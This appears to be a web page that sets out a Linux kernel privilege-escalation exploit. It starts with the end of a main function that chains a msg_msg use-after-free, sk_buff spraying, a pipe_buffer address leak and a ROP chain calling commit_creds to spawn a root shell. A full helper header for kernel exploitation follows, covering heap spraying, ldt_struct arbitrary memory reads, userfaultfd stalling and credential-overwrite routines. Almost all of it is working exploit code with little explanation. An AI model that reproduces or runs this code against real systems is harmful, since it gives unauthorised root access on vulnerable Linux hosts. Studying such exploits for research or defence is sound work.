nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m0x%lx\n", nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m0x%lx\n", victim_addr);

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

memset(fake_secondary_msg, 0, sizeof(fake_secondary_msg));
build_msg((struct msg_msg *)fake_secondary_msg, victim_addr, victim_addr, VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (read_msg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
err_exit("failed to receive secondary msg!");

for (int i = 0; i < PIPE_NUM; i++)
{
if (pipe(pipe_fd[i]) < 0)
err_exit("failed to create pipe!");

if (write(pipe_fd[i][1], "yhellow", 8) < 0)
err_exit("failed to write the pipe!");
}

pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
for (int i = 0; i < SOCKET_NUM; i++)
{
for (int j = 0; j < SK_BUFF_NUM; j++)
{
if (read(sk_sockets[i][1], &fake_secondary_msg,
sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

if (pipe_buf_ptr->ops > 0xffffffff81000000){
print_hex(pipe_buf_ptr,sizeof(struct pipe_buffer));
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%p\n", pipe_buf_ptr->ops);
kernel_offset = (uint64_t)pipe_buf_ptr->ops - 0xffffffff8223d800;
kernel_base = 0xffffffff81000000 + kernel_offset;
memcpy(&secondary_msg,&fake_secondary_msg,sizeof(secondary_msg));
}
}
}

printf("\033[32m\033[1m[+] kernel base: \033[0m0x%lx \033[32m\033[1moffset: \033[0m0x%lx\n", kernel_base, kernel_offset);

pipe_buf_ptr = (struct pipe_buffer *) fake_secondary_msg;
pipe_buf_ptr->page = *(uint64_t*) "yhellow";
pipe_buf_ptr->ops = victim_addr + 0x100;

ops_ptr = (struct pipe_buf_operations *) &fake_secondary_msg[0x100];
ops_ptr->release = 0xffffffff8130245e + kernel_offset; // PUSH_RSI_POP_RSP_POP_4VAL_RET

rop_idx = 0;
rop_chain = (uint64_t*) &fake_secondary_msg[0x20];
rop_chain[rop_idx++] = kernel_offset + 0xffffffff8100f530; // pop_rdi_ret
rop_chain[rop_idx++] = kernel_offset + 0xffffffff82889040; // INIT_CRED
rop_chain[rop_idx++] = kernel_offset + 0xffffffff810df150; // COMMIT_CREDS
rop_chain[rop_idx++] = kernel_offset + 0xffffffff81e00fb0+22; // SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22;
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = get_root_shell;
rop_chain[rop_idx++] = user_cs;
rop_chain[rop_idx++] = user_rflags;
rop_chain[rop_idx++] = user_sp;
rop_chain[rop_idx++] = user_ss;

if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

// for gdb attach only
printf("[*] gadget: %p\n", kernel_offset + 0xffffffff8130245e);
sleep(5);

puts("[*] trigger fake ops->release to hijack RIP...");
for (int i = 0; i < PIPE_NUM; i++)
{
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

uint64_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
uint64_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
uint64_t init_task, init_nsproxy, init_cred;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

int print_hex(void *p, int size){
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *))
{
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
puts("[*] Checking for root...");

if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(5);
exit(EXIT_FAILURE);
}

puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

system("/bin/sh");

/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/* for ret2usr attacker */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
void *(*prepare_kernel_cred_ptr)(void *) =
(void *(*)(void*)) prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = (int (*)(void*)) commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

/**
* @brief create an isolate namespace
* note that the caller **SHOULD NOT** be used to get the root, but an operator
* to perform basic exploiting operations in it only
*/
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
* III - pgv pages sprayer related
* not that we should create two process:
* - the parent is the one to send cmd and get root
* - the child creates an isolate userspace by calling unshare_setup(),
* receiving cmd from parent and operates it only
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

/* operations type */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
/* tpacket version for setsockopt */
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0)
{
perror("[-] socket (AF_PACKET)");
exit(1);
}

int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_VERSION)");
exit(1);
}

struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_sizeof_priv = sizeof_priv;
req3.tp_block_nr = block_nr;
req3.tp_block_size = block_size;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = (block_size * block_nr) / frame_size;
req3.tp_retire_blk_tov = timeout;
req3.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_RX_RING)");
exit(1);
}

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_halen = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0)
{
perror("[-] bind (AF_PACKET)");
exit(1);
}

return s;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_ALLOC_PAGE,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_FREE_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void)
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

/* create an isolate namespace*/
unshare_setup();

/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));

if (req.cmd == CMD_ALLOC_PAGE) {
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
} else if (req.cmd == CMD_FREE_PAGE) {
ret = close(socket_fd[req.idx]);
} else {
printf("[x] invalid request: %d\n", req.cmd);
}

write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != CMD_EXIT);
}

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void)
{
/* pipe for pgv */
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

/* child process for pages spray */
if (!fork()) {
spray_cmd_handler();
}
}

/**
* IV - keyctl related
*/

/**
* The MUSL also doesn't contain `keyctl.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

int key_alloc(char *description, void *payload, size_t plen)
{
return syscall(__NR_add_key, "user", description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, void *payload, size_t plen)
{
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, void *buffer, size_t buflen)
{
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

/**
* V - sk_buff spraying related
* note that the sk_buff's tail is with a 320-bytes skb_shared_info
*/
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
* socket's definition should be like:
* int sk_sockets[SOCKET_NUM][2];
*/

int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
printf("[x] failed to create no.%d socket pair!\n", i);
return -1;
}
}

return 0;
}

int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}

return 0;
}

int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}

return 0;
}

/**
* VI - msg_msg related
*/

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
* Somethings we may want to compile the exp binary with MUSL-GCC, which
* doesn't contain the `asm/ldt.h` file.
* As the file is small, I copy that directly to here :)
*/

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
* Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
* not to the default values if you still want to do syscalls. This
* call is more for 32bit mode therefore.
*/
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
* Because this bit is not present in 32-bit user code, user
* programs can pass uninitialized values here. Therefore, in
* any context in which a user_desc comes from a 32-bit program,
* the kernel must act as though lm == 0, regardless of the
* actual value.
*/
unsigned int lm:1;
#endif
};

#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be referred to your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/* desc initializer */
static inline void init_desc(struct user_desc *desc)
{
/* init descriptor info */
desc->base_addr = 0xff0000;
desc->entry_number = 0x8000 / 8;
desc->limit = 0;
desc->seg_32bit = 0;
desc->contents = 0;
desc->limit_in_pages = 0;
desc->lm = 0;
desc->read_exec_only = 0;
desc->seg_not_present = 0;
desc->useable = 0;
}

/**
* @brief burte-force hitting page_offset_base by modifying ldt_struct
*
* @param ldt_cracker function to make the ldt_struct modifiable
* @param cracker_args args of ldt_cracker
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param burte_size size of each burte-force hitting
* @return size_t address of page_offset_base
*/
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
void *cracker_args,
void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args,
uint64_t burte_size)
{
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t temp;
char *buf;
int retval;

/* init descriptor info */
init_desc(&desc);

/* make the ldt_struct modifiable */
ldt_cracker(cracker_args);
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

/* leak kernel direct mapping area by modify_ldt() */
while(1) {
ldt_momdifier(momdifier_args, page_offset_base);
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
break;
}
else if (retval == 0) {
printf("[x] no mm->context.ldt!");
page_offset_base = -1;
break;
}
page_offset_base += burte_size;
}

return page_offset_base;
}

/**
* @brief read the contents from a specific kernel memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param addr address of kernel memory to read
* @param res_buf buf to be written the data from kernel memory
*/
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, size_t addr, char *res_buf)
{
static char buf[0x8000];
struct user_desc desc;
uint64_t temp;
int pipe_fd[2];

/* init descriptor info */
init_desc(&desc);

/* modify the ldt_struct->entries to addr */
ldt_momdifier(momdifier_args, addr);

/* read data by the child process */
pipe(pipe_fd);
if (!fork()) {
/* child */
syscall(SYS_modify_ldt, 0, buf, 0x8000);
write(pipe_fd[1], buf, 0x8000);
exit(0);
} else {
/* parent */
wait(NULL);
read(pipe_fd[0], res_buf, 0x8000);
}

close(pipe_fd[0]);
close(pipe_fd[1]);
}

/**
* @brief seek specific content in the memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param page_offset_base the page_offset_base we leakked before
* @param mem_finder your own function to search on a 0x8000-bytes buf.
* It should be like `size_t func(void *args, char *buf)` and the `buf`
* is where we store the data from kernel in ldt_seeking_memory().
* The return val should be the offset of the `buf`, `-1` for failure
* @param finder_args your own function's args
* @return size_t kernel addr of content to find, -1 for failure
*/
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, uint64_t page_offset_base,
size_t (*mem_finder)(void*, char *), void *finder_args)
{
static char buf[0x8000];
size_t search_addr, result_addr = -1, offset;

search_addr = page_offset_base;

while (1) {
ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, buf);

offset = mem_finder(finder_args, buf);
if (offset != -1) {
result_addr = search_addr + offset;
break;
}

search_addr += 0x8000;
}

return result_addr;
}

/**
* VIII - userfaultfd related code
*/

/**
* The MUSL also doesn't contain `userfaultfd.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* read() structure */
struct uffd_msg {
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

union {
struct {
uint64_t flags;
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT 0x12

struct uffdio_api {
uint64_t api;
uint64_t features;
uint64_t ioctls;
};

struct uffdio_range {
uint64_t start;
uint64_t len;
};

struct uffdio_register {
struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


struct uffdio_copy {
uint64_t dst;
uint64_t src;
uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
void *buf, unsigned long len)
{
register_userfaultfd(monitor_thread, buf, len,
uffd_handler_for_stucking_thread);
}


/**
* IX - kernel structures
*/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
